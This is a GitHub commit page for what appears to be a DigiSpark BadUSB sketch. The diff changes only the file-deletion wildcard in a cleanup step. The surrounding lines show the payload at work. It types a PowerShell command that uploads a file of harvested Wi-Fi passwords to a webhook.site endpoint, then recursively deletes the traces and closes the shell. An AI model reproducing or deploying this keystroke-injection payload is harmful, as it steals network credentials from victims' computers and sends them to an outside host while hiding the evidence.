#3 Naming scheme issue
This commit is contained in:
Muhammad Talha Khan 2021-02-05 15:11:39 +05:00 committed by GitHub
parent 87cf9b16ea
commit f02b47b09d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -25,7 +25,7 @@ void loop() {
DigiKeyboard.delay(500); DigiKeyboard.delay(500);
DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/<ADD-WEBHOOK-ADDRESS-HERE> -Method POST -InFile Wi-Fi-PASS"); //Submitting all passwords on hook DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/<ADD-WEBHOOK-ADDRESS-HERE> -Method POST -InFile Wi-Fi-PASS"); //Submitting all passwords on hook
DigiKeyboard.delay(1000); DigiKeyboard.delay(1000);
DigiKeyboard.println("del Wi-Fi-* /s /f /q"); //cleaning up all the mess DigiKeyboard.println("del Wi-* /s /f /q"); //cleaning up all the mess
DigiKeyboard.delay(500); DigiKeyboard.delay(500);
DigiKeyboard.println("exit"); DigiKeyboard.println("exit");
DigiKeyboard.delay(100); DigiKeyboard.delay(100);